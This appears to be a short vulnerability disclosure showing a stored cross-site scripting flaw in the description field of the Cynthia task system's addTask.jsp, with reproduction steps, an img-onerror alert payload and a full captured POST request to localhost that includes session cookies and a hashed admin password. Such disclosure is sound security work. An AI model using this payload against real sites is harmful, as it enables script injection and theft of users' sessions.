There are XSS vulnerabilities when publishing articles here
1. Create a new article
2. Fill in the necessary content
3. Modify the content of the parameter name description
4. Modify the content to <img/src=x οnerrοr=alert(1)> and use URL encoding
5. The page can successfully trigger the alert function when it is opened
Request packet
POST /cynthia_war/task/addTask.jsp HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-XSRF-TOKEN: null
X-Requested-With: XMLHttpRequest
Content-Length: 286
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/cynthia_war/taskManagement.html?operation=create&templateTypeId=1&templateId=744313
Cookie: JSESSIONID=E14EB66A1AB5F273FC3A19C6A642FC31; UM_distinctid=17a9eb31a96183-07b3b6c79b0a8a8-445567-1fa400-17a9eb31a971b3; CNZZDATA5537061=cnzz_eid%3D258761960-1626155220-%26ntime%3D1636451982; webRootDir="http://localhost:8080/cynthia_war/"; login_username=admin; login_password=21232f297a57a5a743894a0e4a801fc3; userId=""; login_nickname=admin; displayTagDiv=true; rememberMe=aGV5LHlvdSBrbm93LFFBWCBOQiE=
title=1&assignUser=admin&description=%3cimg%2fsrc%3dx%20onerror%3dalert(1)%3e&assignUser=admin&templateId=744313&actionId=744291&statusId=744290&field744314=744340&field744315=744343&field744317=&field744316=&field744318=&field744321=&field744319=&field744320=&field744337=&field744338=中国移动通信集团广西有限公司
4万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
